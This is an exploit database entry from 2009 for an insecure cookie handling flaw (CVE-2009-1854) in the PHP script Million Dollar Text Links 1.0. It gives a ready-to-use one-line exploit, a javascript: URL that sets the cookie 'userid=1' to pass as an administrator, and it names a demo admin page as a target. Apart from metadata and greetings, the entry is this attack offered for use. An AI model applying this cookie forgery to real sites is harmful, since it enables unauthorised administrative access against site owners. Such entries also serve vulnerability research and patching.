Million Dollar Text Links 1.x - Insecure Cookie Handling
Author: HxH
type: webapps
platform: php
port:
date_added: 2009-05-26
date_updated:
verified: 1
codes: OSVDB-54838;CVE-2009-1854
tags:
aliases:
screenshot_url:
application_url:
----------------------------------------------------------------
Million Dollar Text Links Insecure Cookie Handling Vulnerability
----------------------------------------------------------------
Author.: HxH
Contact: HxH[at]live[dot]at
---------------------------
Script.: Million Dollar Text Links 1.0
Home...: http://cmsnx.com/product.about.php?id=12
-------------------------------------------------
Exploit: javascript:document.cookie="userid=1; path=/";
-------------------------------------------------------
demo...: http://kalptarudemos.com/demo/million/admin.php
--------------------------------------------------------
Greetz.: No-Exploit.com Members
-------------------------------
# milw0rm.com [2009-05-27]